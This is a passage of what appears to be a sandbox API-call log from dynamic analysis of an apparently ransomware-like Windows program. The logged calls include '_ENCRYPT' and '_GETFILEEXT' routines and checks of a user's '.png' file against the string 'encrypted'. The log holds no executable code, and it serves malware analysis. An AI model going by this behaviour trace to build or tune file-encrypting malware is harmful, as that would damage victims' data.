lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.767] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0039.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0039.768] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0039.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0039.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0039.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0039.768] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0039.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.769] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cda8 [0039.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cda8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0039.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.769] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0039.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0039.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0039.770] CloseHandle (hObject=0x140) returned 1 [0039.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0039.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.770] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.771] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0039.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.771] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.771] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0039.771] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.771] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0039.771] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0039.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.771] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.771] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.771] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.771] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9f64d90, ftCreationTime.dwHighDateTime=0x1d5be9e, ftLastAccessTime.dwLowDateTime=0x1e377b00, ftLastAccessTime.dwHighDateTime=0x1d5c2d6, ftLastWriteTime.dwLowDateTime=0x1e377b00, ftLastWriteTime.dwHighDateTime=0x1d5c2d6, nFileSizeHigh=0x0, nFileSizeLow=0x4e3f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="80l2TDxo4fCaf.png", cAlternateFileName="80L2TD~1.PNG")) returned 0x7c20c0 [0039.772] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.772] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.772] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9f64d90, ftCreationTime.dwHighDateTime=0x1d5be9e, ftLastAccessTime.dwLowDateTime=0x1e377b00, ftLastAccessTime.dwHighDateTime=0x1d5c2d6, ftLastWriteTime.dwLowDateTime=0x1e377b00, ftLastWriteTime.dwHighDateTime=0x1d5c2d6, nFileSizeHigh=0x0, nFileSizeLow=0x4e3f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="80l2TDxo4fCaf.png", cAlternateFileName="80L2TD~1.PNG")) returned 0x7c20c0 [0039.772] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.772] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.773] CompareStringW (Locale=0x400, 